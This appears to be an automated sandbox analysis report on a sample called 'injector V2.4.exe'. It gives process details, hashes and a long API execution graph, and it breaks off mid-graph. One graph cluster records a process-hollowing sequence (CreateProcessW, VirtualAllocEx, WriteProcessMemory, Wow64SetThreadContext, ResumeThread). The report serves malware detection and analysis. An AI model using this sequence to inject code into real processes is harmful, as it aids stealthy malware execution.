                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1767&sent=302&recv=590&lost=0&retrans=0&sent_bytes=2845&recv_bytes=571755&delivery_rate=1583514&cwnd=218&unsent_bytes=0&cid=3be4688550219720&ts=2226&x=0"


                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to dive into process behavior distribution

                                                                                  Click to jump to process

                                                                                  Target ID:0
                                                                                  Start time:10:51:55
                                                                                  Start date:21/11/2024
                                                                                  Path:C:\Users\user\Desktop\injector V2.4.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\injector V2.4.exe"
                                                                                  Imagebase:0xb20000
                                                                                  File size:587'904 bytes
                                                                                  MD5 hash:837840F37E344F8E7BC187F88F93C4A8
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:1
                                                                                  Start time:10:51:55
                                                                                  Start date:21/11/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff6d64d0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:10:51:57
                                                                                  Start date:21/11/2024
                                                                                  Path:C:\Users\user\Desktop\injector V2.4.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Users\user\Desktop\injector V2.4.exe"
                                                                                  Imagebase:0xb20000
                                                                                  File size:587'904 bytes
                                                                                  MD5 hash:837840F37E344F8E7BC187F88F93C4A8
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:10:51:57
                                                                                  Start date:21/11/2024
                                                                                  Path:C:\Users\user\Desktop\injector V2.4.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\injector V2.4.exe"
                                                                                  Imagebase:0xb20000
                                                                                  File size:587'904 bytes
                                                                                  MD5 hash:837840F37E344F8E7BC187F88F93C4A8
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:2.1%
                                                                                    Dynamic/Decrypted Code Coverage:0.8%
                                                                                    Signature Coverage:4.3%
                                                                                    Total number of Nodes:1165
                                                                                    Total number of Limit Nodes:20
                                                                                    execution_graph 16333 b2a0b0 16334 b2a0f0 16333->16334 16335 b2a14c ExitProcess 16334->16335 16336 b2a126 ExitProcess 16334->16336 17513 b48e90 17516 b49d60 17513->17516 17515 b48ea5 17517 b49d74 17516->17517 17518 b49d6d 17516->17518 17517->17515 17520 b4bc74 17518->17520 17521 b4dc4b __freea 14 API calls 17520->17521 17522 b4bc8c 17521->17522 17522->17517 17458 b5d18d 17460 b5d1c3 17458->17460 17459 b5d310 GetPEB 17461 b5d322 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 17459->17461 17460->17459 17460->17461 17464 b5d3b9 TerminateProcess 17460->17464 17461->17460 17462 b5d3c9 WriteProcessMemory 17461->17462 17463 b5d40e 17462->17463 17465 b5d450 WriteProcessMemory Wow64SetThreadContext ResumeThread 17463->17465 17466 b5d413 WriteProcessMemory 17463->17466 17464->17460 17466->17463 17566 b3c2e3 17567 b3c788 17566->17567 17568 b3c2ee 17566->17568 17570 b3d463 17567->17570 17571 b3c79e 17567->17571 17581 b3c7b4 17567->17581 17569 b3d4a0 5 API calls 17568->17569 17579 b3c107 17568->17579 17569->17579 17576 b3d480 17570->17576 17570->17579 17597 b3dd00 17570->17597 17582 b3d4a0 17571->17582 17578 b48dd1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 17576->17578 17580 b3d48a 17578->17580 17581->17579 17593 b47840 17581->17593 17587 b3d4e6 17582->17587 17583 b3da54 17585 b48dd1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 17583->17585 17584 b3e730 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17584->17587 17586 b3c7a5 17585->17586 17589 b3f340 17586->17589 17587->17583 17587->17584 17588 b3ea30 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17587->17588 17588->17587 17590 b3f3af 17589->17590 17591 b48dd1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 17590->17591 17592 b41304 17591->17592 17592->17581 17596 b47890 CatchIt 17593->17596 17594 b48dd1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 17595 b48701 17594->17595 17595->17579 17596->17594 17598 b3dd82 17597->17598 17601 b48e41 17598->17601 17600 b3de64 17608 b48ebd 17601->17608 17604 b49ab5 Concurrency::cancel_current_task RaiseException 17605 b48e60 17604->17605 17611 b448f0 17605->17611 17617 b48ddf 17608->17617 17613 b44942 17611->17613 17612 b49cfd 40 API calls ___std_exception_copy 17612->17613 17613->17612 17614 b44aeb 17613->17614 17615 b48dd1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 17614->17615 17616 b44cbb 17615->17616 17616->17600 17620 b49cfd 17617->17620 17621 b49d0a 17620->17621 17627 b48e0b 17620->17627 17621->17627 17628 b4bc8f 17621->17628 17624 b49d37 17626 b4bc74 ___std_exception_destroy 14 API calls 17624->17626 17625 b4c1ec ___std_exception_copy 39 API calls 17625->17624 17626->17627 17627->17604 17633 b4eb9b _unexpected 17628->17633 17629 b4ebd9 17630 b4e41c __strnicoll 14 API calls 17629->17630 17632 b49d27 17630->17632 17631 b4ebc4 RtlAllocateHeap 17631->17632 17631->17633 17632->17624 17632->17625 17633->17629 17633->17631 17634 b4abd8 _unexpected 2 API calls 17633->17634 17634->17633 16339 b2b0e4 ReadFile 16340 b2a1f0 16339->16340 16341 b49132 16342 b4913e ___scrt_is_nonwritable_in_current_image 16341->16342 16367 b493ef 16342->16367 16344 b49145 16345 b4929e 16344->16345 16354 b4916f ___scrt_is_nonwritable_in_current_image _unexpected ___scrt_release_startup_lock 16344->16354 16404 b496af IsProcessorFeaturePresent 16345->16404 16347 b492a5 16408 b4a8a6 16347->16408 16352 b4918e 16354->16352 16356 b4920f 16354->16356 16382 b4a8f0 16354->16382 16378 b4b426 16356->16378 16357 b49215 16389 b33270 16357->16389 16362 b4923a 16363 b49243 16362->16363 16395 b4a8d2 16362->16395 16398 b49428 16363->16398 16368 b493f8 16367->16368 16414 b498d5 IsProcessorFeaturePresent 16368->16414 16372 b49409 16373 b4940d 16372->16373 16424 b4a770 16372->16424 16373->16344 16376 b49424 16376->16344 16379 b4b42f 16378->16379 16380 b4b434 16378->16380 16496 b4b54f 16379->16496 16380->16357 16383 b4a906 _unexpected 16382->16383 16384 b4bd2b ___scrt_is_nonwritable_in_current_image 16382->16384 16383->16356 16385 b4cb8a _unexpected 39 API calls 16384->16385 16388 b4bd3c 16385->16388 16386 b4c09e CallUnexpected 39 API calls 16387 b4bd66 16386->16387 16388->16386 16390 b332c0 16389->16390 16391 b48dd1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 16390->16391 16392 b3342b 16391->16392 16393 b4965c GetModuleHandleW 16392->16393 16394 b49236 16393->16394 16394->16347 16394->16362 17230 b4a9f1 16395->17230 16399 b49434 16398->16399 16403 b4924c 16399->16403 17301 b4a782 16399->17301 16401 b49442 16402 b49dda ___scrt_uninitialize_crt 7 API calls 16401->16402 16402->16403 16403->16352 16405 b496c5 _unexpected 16404->16405 16406 b49770 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16405->16406 16407 b497bb _unexpected 16406->16407 16407->16347 16409 b4a9f1 _unexpected 21 API calls 16408->16409 16410 b492ab 16409->16410 16411 b4a8bc 16410->16411 16412 b4a9f1 _unexpected 21 API calls 16411->16412 16413 b492b3 16412->16413 16415 b49404 16414->16415 16416 b49dbb 16415->16416 16433 b4c246 16416->16433 16419 b49dc4 16419->16372 16421 b49dcc 16422 b49dd7 16421->16422 16447 b4c282 16421->16447 16422->16372 16487 b4dc85 16424->16487 16427 b49dda 16428 b49de3 16427->16428 16429 b49ded 16427->16429 16430 b4c115 ___vcrt_uninitialize_ptd 6 API calls 16428->16430 16429->16373 16431 b49de8 16430->16431 16432 b4c282 ___vcrt_uninitialize_locks DeleteCriticalSection 16431->16432 16432->16429 16434 b4c24f 16433->16434 16436 b4c278 16434->16436 16437 b49dc0 16434->16437 16451 b50bdb 16434->16451 16438 b4c282 ___vcrt_uninitialize_locks DeleteCriticalSection 16436->16438 16437->16419 16439 b4c0e2 16437->16439 16438->16437 16468 b50aec 16439->16468 16442 b4c0f7 16442->16421 16445 b4c112 16445->16421 16448 b4c2ac 16447->16448 16449 b4c28d 16447->16449 16448->16419 16450 b4c297 DeleteCriticalSection 16449->16450 16450->16448 16450->16450 16456 b50c6d 16451->16456 16454 b50c13 InitializeCriticalSectionAndSpinCount 16455 b50bfe 16454->16455 16455->16434 16457 b50c8e 16456->16457 16458 b50bf5 16456->16458 16457->16458 16459 b50cf6 GetProcAddress 16457->16459 16461 b50ce7 16457->16461 16463 b50c22 LoadLibraryExW 16457->16463 16458->16454 16458->16455 16459->16458 16461->16459 16462 b50cef FreeLibrary 16461->16462 16462->16459 16464 b50c39 GetLastError 16463->16464 16465 b50c69 16463->16465 16464->16465 16466 b50c44 ___vcrt_FlsGetValue 16464->16466 16465->16457 16466->16465 16467 b50c5a LoadLibraryExW 16466->16467 16467->16457 16469 b50c6d ___vcrt_FlsGetValue 5 API calls 16468->16469 16470 b50b06 16469->16470 16471 b50b1f TlsAlloc 16470->16471 16472 b4c0ec 16470->16472 16472->16442 16473 b50b9d 16472->16473 16474 b50c6d ___vcrt_FlsGetValue 5 API calls 16473->16474 16475 b50bb7 16474->16475 16476 b4c105 16475->16476 16477 b50bd2 TlsSetValue 16475->16477 16476->16445 16478 b4c115 16476->16478 16477->16476 16479 b4c125 16478->16479 16480 b4c11f 16478->16480 16479->16442 16482 b50b27 16480->16482 16483 b50c6d ___vcrt_FlsGetValue 5 API calls 16482->16483 16484 b50b41 16483->16484 16485 b50b59 TlsFree 16484->16485 16486 b50b4d 16484->16486 16485->16486 16486->16479 16488 b4dc95 16487->16488 16489 b49416 16487->16489 16488->16489 16491 b4d2b2 16488->16491 16489->16376 16489->16427 16492 b4d2b9 16491->16492 16493 b4d2fc GetStdHandle 16492->16493 16494 b4d35e 16492->16494 16495 b4d30f GetFileType 16492->16495 16493->16492 16494->16488 16495->16492 16497 b4b558 16496->16497 16501 b4b56e 16496->16501 16497->16501 16502 b4b490 16497->16502 16499 b4b565 16499->16501 16519 b4b65d 16499->16519 16501->16380 16503 b4b49c 16502->16503 16504 b4b499 16502->16504 16528 b4d400 16503->16528 16504->16499 16509 b4b4ad 16511 b4dc4b __freea 14 API calls 16509->16511 16510 b4b4b9 16555 b4b57b 16510->16555 16513 b4b4b3 16511->16513 16513->16499 16515 b4dc4b __freea 14 API calls 16516 b4b4dd 16515->16516 16517 b4dc4b __freea 14 API calls 16516->16517 16518 b4b4e3 16517->16518 16518->16499 16520 b4b6ce 16519->16520 16525 b4b66c 16519->16525 16520->16501 16521 b5010e WideCharToMultiByte ___scrt_uninitialize_crt 16521->16525 16522 b4eb3e _unexpected 14 API calls 16522->16525 16523 b4b6d2 16524 b4dc4b __freea 14 API calls 16523->16524 16524->16520 16525->16520 16525->16521 16525->16522 16525->16523 16527 b4dc4b __freea 14 API calls 16525->16527 16949 b502e1 16525->16949 16527->16525 16529 b4b4a2 16528->16529 16530 b4d409 16528->16530 16534 b5020a GetEnvironmentStringsW 16529->16534 16577 b4cc45 16530->16577 16535 b4b4a7 16534->16535 16536 b50222 16534->16536 16535->16509 16535->16510 16537 b5010e ___scrt_uninitialize_crt WideCharToMultiByte 16536->16537 16538 b5023f 16537->16538 16539 b50254 16538->16539 16540 b50249 FreeEnvironmentStringsW 16538->16540 16541 b4eb9b __strnicoll 15 API calls 16539->16541 16540->16535 16542 b5025b 16541->16542 16543 b50274 16542->16543 16544 b50263 16542->16544 16546 b5010e ___scrt_uninitialize_crt WideCharToMultiByte 16543->16546 16545 b4dc4b __freea 14 API calls 16544->16545 16547 b50268 FreeEnvironmentStringsW 16545->16547 16548 b50284 16546->16548 16547->16535 16549 b50293 16548->16549 16550 b5028b 16548->16550 16552 b4dc4b __freea 14 API calls 16549->16552 16551 b4dc4b __freea 14 API calls 16550->16551 16553 b50291 FreeEnvironmentStringsW 16551->16553 16552->16553 16553->16535 16556 b4b590 16555->16556 16557 b4eb3e _unexpected 14 API calls 16556->16557 16558 b4b5b7 16557->16558 16559 b4b5bf 16558->16559 16568 b4b5c9 16558->16568 16560 b4dc4b __freea 14 API calls 16559->16560 16576 b4b4c0 16560->16576 16561 b4b626 16562 b4dc4b __freea 14 API calls 16561->16562 16562->16576 16563 b4eb3e _unexpected 14 API calls 16563->16568 16564 b4b635 16939 b4b520 16564->16939 16568->16561 16568->16563 16568->16564 16570 b4b650 16568->16570 16572 b4dc4b __freea 14 API calls 16568->16572 16930 b4c1ec 16568->16930 16569 b4dc4b __freea 14 API calls 16571 b4b642 16569->16571 16945 b4b766 IsProcessorFeaturePresent 16570->16945 16574 b4dc4b __freea 14 API calls 16571->16574 16572->16568 16574->16576 16575 b4b65c 16576->16515 16578 b4cc50 16577->16578 16579 b4cc56 16577->16579 16580 b4c700 _unexpected 6 API calls 16578->16580 16581 b4c73f _unexpected 6 API calls 16579->16581 16583 b4cc5c 16579->16583 16580->16579 16582 b4cc70 16581->16582 16582->16583 16584 b4cc74 16582->16584 16586 b4cc61 16583->16586 16627 b4c09e 16583->16627 16587 b4eb3e _unexpected 14 API calls 16584->16587 16605 b4d843 16586->16605 16589 b4cc80 16587->16589 16590 b4cc9d 16589->16590 16591 b4cc88 16589->16591 16593 b4c73f _unexpected 6 API calls 16590->16593 16592 b4c73f _unexpected 6 API calls 16591->16592 16594 b4cc94 16592->16594 16595 b4cca9 16593->16595 16598 b4dc4b __freea 14 API calls 16594->16598 16596 b4ccbc 16595->16596 16597 b4ccad 16595->16597 16600 b4ce9c _unexpected 14 API calls 16596->16600 16599 b4c73f _unexpected 6 API calls 16597->16599 16601 b4cc9a 16598->16601 16599->16594 16602 b4ccc7 16600->16602 16601->16583 16603 b4dc4b __freea 14 API calls 16602->16603 16604 b4ccce 16603->16604 16604->16586 16606 b4d86d 16605->16606 16751 b4d6cf 16606->16751 16609 b4d886 16609->16529 16612 b4d8ad 16765 b4d4ca 16612->16765 16613 b4d89f 16614 b4dc4b __freea 14 API calls 16613->16614 16614->16609 16617 b4d8e5 16618 b4e41c __strnicoll 14 API calls 16617->16618 16621 b4d8ea 16618->16621 16619 b4d92c 16622 b4d975 16619->16622 16776 b4dbfe 16619->16776 16620 b4d900 16620->16619 16624 b4dc4b __freea 14 API calls 16620->16624 16623 b4dc4b __freea 14 API calls 16621->16623 16626 b4dc4b __freea 14 API calls 16622->16626 16623->16609 16624->16619 16626->16609 16638 b4dd3c 16627->16638 16630 b4c0ae 16632 b4c0b8 IsProcessorFeaturePresent 16630->16632 16637 b4c0d7 16630->16637 16634 b4c0c4 16632->16634 16633 b4a8bc _unexpected 21 API calls 16635 b4c0e1 16633->16635 16668 b4b79a 16634->16668 16637->16633 16674 b4dfbf 16638->16674 16641 b4dd63 16644 b4dd6f ___scrt_is_nonwritable_in_current_image 16641->16644 16642 b4dda0 _unexpected 16645 b4ddbf 16642->16645 16647 b4ddd1 _unexpected 16642->16647 16667 b4dda9 16642->16667 16643 b4ccdb __dosmaperr 14 API calls 16643->16642 16644->16642 16644->16643 16644->16645 16644->16647 16646 b4e41c __strnicoll 14 API calls 16645->16646 16649 b4ddc4 16646->16649 16648 b4de07 _unexpected 16647->16648 16688 b4cae1 EnterCriticalSection 16647->16688 16653 b4de44 16648->16653 16654 b4df41 16648->16654 16664 b4de72 16648->16664 16685 b4b739 16649->16685 16653->16664 16689 b4cb8a GetLastError 16653->16689 16656 b4df4c 16654->16656 16720 b4caf8 LeaveCriticalSection 16654->16720 16658 b4a8bc _unexpected 21 API calls 16656->16658 16660 b4df54 16658->16660 16661 b4cb8a _unexpected 39 API calls 16665 b4dec7 16661->16665 16663 b4cb8a _unexpected 39 API calls 16663->16664 16716 b4deed 16664->16716 16666 b4cb8a _unexpected 39 API calls 16665->16666 16665->16667 16666->16667 16667->16630 16669 b4b7b6 _unexpected 16668->16669 16670 b4b7e2 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16669->16670 16671 b4b8b3 _unexpected 16670->16671 16743 b48dd1 16671->16743 16673 b4b8d1 16673->16637 16675 b4dfcb ___scrt_is_nonwritable_in_current_image 16674->16675 16680 b4cae1 EnterCriticalSection 16675->16680 16677 b4dfd9 16681 b4e01b 16677->16681 16680->16677 16684 b4caf8 LeaveCriticalSection 16681->16684 16683 b4c0a3 16683->16630 16683->16641 16684->16683 16721 b4ba6f 16685->16721 16688->16648 16690 b4cba0 16689->16690 16693 b4cba6 16689->16693 16691 b4c700 _unexpected 6 API calls 16690->16691 16691->16693 16692 b4c73f _unexpected 6 API calls 16694 b4cbc2 16692->16694 16693->16692 16713 b4cbaa SetLastError 16693->16713 16696 b4eb3e _unexpected 14 API calls 16694->16696 16694->16713 16699 b4cbd7 16696->16699 16697 b4cc3f 16700 b4c09e CallUnexpected 37 API calls 16697->16700 16698 b4cc3a 16698->16663 16701 b4cbf0 16699->16701 16702 b4cbdf 16699->16702 16704 b4cc44 16700->16704 16703 b4c73f _unexpected 6 API calls 16701->16703 16705 b4c73f _unexpected 6 API calls 16702->16705 16706 b4cbfc 16703->16706 16707 b4cbed 16705->16707 16708 b4cc17 16706->16708 16709 b4cc00 16706->16709 16711 b4dc4b __freea 14 API calls 16707->16711 16712 b4ce9c _unexpected 14 API calls 16708->16712 16710 b4c73f _unexpected 6 API calls 16709->16710 16710->16707 16711->16713 16714 b4cc22 16712->16714 16713->16697 16713->16698 16715 b4dc4b __freea 14 API calls 16714->16715 16715->16713 16717 b4def1 16716->16717 16718 b4deb9 16716->16718 16742 b4caf8 LeaveCriticalSection 16717->16742 16718->16661 16718->16665 16718->16667 16720->16656 16722 b4ba81 __strnicoll 16721->16722 16727 b4b8e2 16722->16727 16728 b4b8f2 16727->16728 16729 b4b8f9 16727->16729 16730 b4ba00 __strnicoll 16 API calls 16728->16730 16731 b4ba46 __strnicoll GetLastError SetLastError 16729->16731 16735 b4b907 16729->16735 16730->16729 16732 b4b92e 16731->16732 16733 b4b766 __strnicoll 11 API calls 16732->16733 16732->16735 16734 b4b95e 16733->16734 16736 b4b9a7 16735->16736 16737 b4b9b3 16736->16737 16738 b4b9ca 16737->16738 16739 b4b9e3 __strnicoll 39 API calls 16737->16739 16740 b4b745 16738->16740 16741 b4b9e3 __strnicoll 39 API calls 16738->16741 16739->16738 16740->16667 16741->16740 16742->16718 16744 b48dd9 16743->16744 16745 b48dda IsProcessorFeaturePresent 16743->16745 16744->16673 16747 b48f4a 16745->16747 16750 b4902f SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16747->16750 16749 b4902d 16749->16673 16750->16749 16784 b4d448 16751->16784 16754 b4d6f0 GetOEMCP 16756 b4d719 16754->16756 16755 b4d702 16755->16756 16757 b4d707 GetACP 16755->16757 16756->16609 16758 b4eb9b 16756->16758 16757->16756 16759 b4ebd9 16758->16759 16763 b4eba9 _unexpected 16758->16763 16760 b4e41c __strnicoll 14 API calls 16759->16760 16762 b4d897 16760->16762 16761 b4ebc4 RtlAllocateHeap 16761->16762 16761->16763 16762->16612 16762->16613 16763->16759 16763->16761 16764 b4abd8 _unexpected 2 API calls 16763->16764 16764->16763 16766 b4d6cf 41 API calls 16765->16766 16767 b4d4ea 16766->16767 16768 b4d5ef 16767->16768 16770 b4d527 IsValidCodePage 16767->16770 16775 b4d542 _unexpected 16767->16775 16769 b48dd1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 16768->16769 16771 b4d6cd 16769->16771 16770->16768 16772 b4d539 16770->16772 16771->16617 16771->16620 16773 b4d562 GetCPInfo 16772->16773 16772->16775 16773->16768 16773->16775 16824 b4da59 16775->16824 16777 b4dc0a ___scrt_is_nonwritable_in_current_image 16776->16777 16904 b4cae1 EnterCriticalSection 16777->16904 16779 b4dc14 16905 b4d998 16779->16905 16785 b4d466 16784->16785 16786 b4d45f 16784->16786 16785->16786 16787 b4cb8a _unexpected 39 API calls 16785->16787 16786->16754 16786->16755 16788 b4d487 16787->16788 16792 b50916 16788->16792 16793 b4d49d 16792->16793 16794 b50929 16792->16794 16796 b50943 16793->16796 16794->16793 16800 b4f0cf 16794->16800 16797 b50956 16796->16797 16798 b5096b 16796->16798 16797->16798 16821 b4d3e3 16797->16821 16798->16786 16801 b4f0db ___scrt_is_nonwritable_in_current_image 16800->16801 16802 b4cb8a _unexpected 39 API calls 16801->16802 16803 b4f0e4 16802->16803 16804 b4f12a 16803->16804 16813 b4cae1 EnterCriticalSection 16803->16813 16804->16793 16806 b4f102 16814 b4f150 16806->16814 16811 b4c09e CallUnexpected 39 API calls 16812 b4f14f 16811->16812 16813->16806 16815 b4f113 16814->16815 16816 b4f15e _unexpected 16814->16816 16818 b4f12f 16815->16818 16816->16815 16817 b4ef04 _unexpected 14 API calls 16816->16817 16817->16815 16819 b4caf8 _unexpected LeaveCriticalSection 16818->16819 16820 b4f126 16819->16820 16820->16804 16820->16811 16822 b4cb8a _unexpected 39 API calls 16821->16822 16823 b4d3e8 16822->16823 16823->16798 16825 b4da81 GetCPInfo 16824->16825 16826 b4db4a 16824->16826 16825->16826 16832 b4da99 16825->16832 16828 b48dd1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 16826->16828 16830 b4dbfc 16828->16830 16830->16768 16835 b4ec43 16832->16835 16834 b50e3f 44 API calls 16834->16826 16836 b4d448 __strnicoll 39 API calls 16835->16836 16837 b4ec63 16836->16837 16855 b4ed44 16837->16855 16839 b4ed1f 16842 b48dd1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 16839->16842 16840 b4ed17 16858 b4ec23 16840->16858 16841 b4ec90 16841->16839 16841->16840 16844 b4eb9b __strnicoll 15 API calls 16841->16844 16846 b4ecb5 _unexpected __alloca_probe_16 16841->16846 16845 b4db01 16842->16845 16844->16846 16850 b50e3f 16845->16850 16846->16840 16847 b4ed44 __strnicoll MultiByteToWideChar 16846->16847 16848 b4ecfe 16847->16848 16848->16840 16849 b4ed05 GetStringTypeW 16848->16849 16849->16840 16851 b4d448 __strnicoll 39 API calls 16850->16851 16852 b50e52 16851->16852 16864 b50e88 16852->16864 16862 b4ed6e 16855->16862 16859 b4ec2f 16858->16859 16861 b4ec40 16858->16861 16860 b4dc4b __freea 14 API calls 16859->16860 16859->16861 16860->16861 16861->16839 16863 b4ed60 MultiByteToWideChar 16862->16863 16863->16841 16865 b50ea3 __strnicoll 16864->16865 16866 b4ed44 __strnicoll MultiByteToWideChar 16865->16866 16869 b50ee7 16866->16869 16867 b51062 16868 b48dd1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 16867->16868 16870 b4db22 16868->16870 16869->16867 16871 b4eb9b __strnicoll 15 API calls 16869->16871 16873 b50f0d __alloca_probe_16 16869->16873 16884 b50fb5 16869->16884 16870->16834 16871->16873 16872 b4ec23 __freea 14 API calls 16872->16867 16874 b4ed44 __strnicoll MultiByteToWideChar 16873->16874 16873->16884 16875 b50f56 16874->16875 16875->16884 16892 b4c7cc 16875->16892 16878 b50fc4 16880 b5104d 16878->16880 16881 b4eb9b __strnicoll 15 API calls 16878->16881 16885 b50fd6 __alloca_probe_16 16878->16885 16879 b50f8c 16883 b4c7cc 7 API calls 16879->16883 16879->16884 16882 b4ec23 __freea 14 API calls 16880->16882 16881->16885 16882->16884 16883->16884 16884->16872 16885->16880 16886 b4c7cc 7 API calls 16885->16886 16887 b51019 16886->16887 16887->16880 16901 b5010e 16887->16901 16889 b51033 16889->16880 16890 b5103c 16889->16890 16891 b4ec23 __freea 14 API calls 16890->16891 16891->16884 16893 b4ca1e LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 16892->16893 16894 b4c7d7 16893->16894 16895 b4c804 16894->16895 16896 b4c7dd LCMapStringEx 16894->16896 16897 b4c829 __strnicoll 5 API calls 16895->16897 16900 b4c824 16896->16900 16899 b4c81d LCMapStringW 16897->16899 16899->16900 16900->16878 16900->16879 16900->16884 16903 b50121 ___scrt_uninitialize_crt 16901->16903 16902 b5015f WideCharToMultiByte 16902->16889 16903->16902 16904->16779 16915 b4d362 16905->16915 16907 b4d9ba 16908 b4d362 39 API calls 16907->16908 16909 b4d9d9 16908->16909 16910 b4da00 16909->16910 16911 b4dc4b __freea 14 API calls 16909->16911 16912 b4dc3f 16910->16912 16911->16910 16929 b4caf8 LeaveCriticalSection 16912->16929 16914 b4dc2d 16914->16622 16916 b4d373 16915->16916 16920 b4d36f CatchIt 16915->16920 16917 b4d37a 16916->16917 16922 b4d38d _unexpected 16916->16922 16918 b4e41c __strnicoll 14 API calls 16917->16918 16919 b4d37f 16918->16919 16921 b4b739 __strnicoll 39 API calls 16919->16921 16920->16907 16921->16920 16922->16920 16923 b4d3c4 16922->16923 16924 b4d3bb 16922->16924 16923->16920 16927 b4e41c __strnicoll 14 API calls 16923->16927 16925 b4e41c __strnicoll 14 API calls 16924->16925 16926 b4d3c0 16925->16926 16928 b4b739 __strnicoll 39 API calls 16926->16928 16927->16926 16928->16920 16929->16914 16931 b4c1fa 16930->16931 16932 b4c208 16930->16932 16931->16932 16937 b4c220 16931->16937 16933 b4e41c __strnicoll 14 API calls 16932->16933 16934 b4c210 16933->16934 16935 b4b739 __strnicoll 39 API calls 16934->16935 16936 b4c21a 16935->16936 16936->16568 16937->16936 16938 b4e41c __strnicoll 14 API calls 16937->16938 16938->16934 16940 b4b54a 16939->16940 16941 b4b52d 16939->16941 16940->16569 16942 b4b544 16941->16942 16943 b4dc4b __freea 14 API calls 16941->16943 16944 b4dc4b __freea 14 API calls 16942->16944 16943->16941 16944->16940 16946 b4b772 16945->16946 16947 b4b79a _unexpected 8 API calls 16946->16947 16948 b4b787 GetCurrentProcess TerminateProcess 16947->16948 16948->16575 16950 b502ec 16949->16950 16951 b502fd 16950->16951 16953 b50310 ___from_strstr_to_strchr 16950->16953 16952 b4e41c __strnicoll 14 API calls 16951->16952 16961 b50302 16952->16961 16954 b50527 16953->16954 16956 b50330 16953->16956 16955 b4e41c __strnicoll 14 API calls 16954->16955 16957 b5052c 16955->16957 17012 b5054c 16956->17012 16959 b4dc4b __freea 14 API calls 16957->16959 16959->16961 16961->16525 16962 b50374 16998 b50360 16962->16998 17016 b50566 16962->17016 16963 b50376 16967 b4eb3e _unexpected 14 API calls 16963->16967 16963->16998 16965 b50352 16970 b5036f 16965->16970 16971 b5035b 16965->16971 16969 b50384 16967->16969 16968 b4dc4b __freea 14 API calls 16968->16961 16973 b4dc4b __freea 14 API calls 16969->16973 16975 b5054c 39 API calls 16970->16975 16974 b4e41c __strnicoll 14 API calls 16971->16974 16972 b503e9 16976 b4dc4b __freea 14 API calls 16972->16976 16977 b5038f 16973->16977 16974->16998 16975->16962 16982 b503f1 16976->16982 16977->16962 16980 b4eb3e _unexpected 14 API calls 16977->16980 16977->16998 16978 b50434 16979 b50024 42 API calls 16978->16979 16978->16998 16981 b50462 16979->16981 16983 b503ab 16980->16983 16985 b4dc4b __freea 14 API calls 16981->16985 16989 b5041e 16982->16989 17020 b50024 16982->17020 16987 b4dc4b __freea 14 API calls 16983->16987 16984 b5051c 16988 b4dc4b __freea 14 API calls 16984->16988 16985->16989 16987->16962 16988->16961 16989->16984 16992 b4eb3e _unexpected 14 API calls 16989->16992 16989->16998 16990 b50415 16991 b4dc4b __freea 14 API calls 16990->16991 16991->16989 16993 b504ad 16992->16993 16994 b504b5 16993->16994 16995 b504bd 16993->16995 16996 b4dc4b __freea 14 API calls 16994->16996 16997 b4c1ec ___std_exception_copy 39 API calls 16995->16997 16996->16998 16999 b504c9 16997->16999 16998->16968 17000 b50541 16999->17000 17001 b504d0 16999->17001 17002 b4b766 __strnicoll 11 API calls 17000->17002 17029 b5366c 17001->17029 17004 b5054b 17002->17004 17006 b504f7 17008 b4e41c __strnicoll 14 API calls 17006->17008 17007 b50516 